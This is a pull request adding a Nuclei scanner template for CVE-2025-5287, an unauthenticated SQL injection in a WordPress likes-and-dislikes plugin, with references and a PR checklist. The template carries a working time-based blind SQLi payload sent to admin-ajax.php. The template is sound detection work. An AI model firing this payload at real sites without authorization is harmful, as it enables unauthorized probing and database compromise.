### PR TITLE
Adding CVE-2025-5287.yaml

### DIFF
--- a/http/cves/2025/CVE-2025-5287.yaml
+++ b/http/cves/2025/CVE-2025-5287.yaml
@@ -1,0 +1,36 @@
+id: cve-2025-5287
+
+info:
+  name: Likes and Dislikes Wordpress Plugin Unauthenticated SQLi Vulnerability
+  author: CodeStuffBreakThings
+  description: The Likes and Dislikes Plugin plugin for WordPress is vulnerable to SQL Injection via the 'post' parameter in all versions up to, and including, 1.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Vulnerability disclosed by Khaled Alenazi (Nxploited).
+  severity: High
+  remediation: No known patch at this time. Consider removing or disabling the plugin until a patch is released.
+  reference:
+    - https://github.com/advisories/GHSA-2q5m-qpc5-76wp
+    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/inprosysmedia-likes-dislikes-post/likes-and-dislikes-plugin-100-authenticated-subscriber-sql-injection
+    - https://github.com/erumfaham/inprosysmedia-likes-dislikes-post
+    - https://github.com/Nxploited/CVE-2025-5287
+    - https://github.com/wiseep/CVE-2025-5287/tree/main
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2025-5287
+  tags: likes,dislikes,wordpress,plugin,wp-plugin,unauthenticated,sqli,cve,cve2025,cve-2025-5287
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/wp-admin/admin-ajax.php"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+      Connection: close
+    body: action=my_likes_dislikes_action&post=1 AND (SELECT 1234 FROM (SELECT(SLEEP(3)))a)&state=like
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=3'
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### Likes and Dislikes Wordpress Plugin <=1.0.0 Unauthenticated SQLi Vulnerability

Added CVE-2025-5287

- References:
- https://github.com/advisories/GHSA-2q5m-qpc5-76wp
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/inprosysmedia-likes-dislikes-post/likes-and-dislikes-plugin-100-authenticated-subscriber-sql-injection
- https://github.com/erumfaham/inprosysmedia-likes-dislikes-post
- https://github.com/Nxploited/CVE-2025-5287
- https://github.com/wiseep/CVE-2025-5287/tree/main

### Template Validation

I've validated this template locally?
- [X] YES
- [ ] NO

#### Additional Details (leave it blank if not applicable)
Wordpress has pulled the plugin from their plugins site while they review it. The code can still be found on the plugin author's Github site linked above or on the Wordpress TracBrowser. Given that the last update to the plugin was 4 years ago, it is unlikely that it will receive a patch.
<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)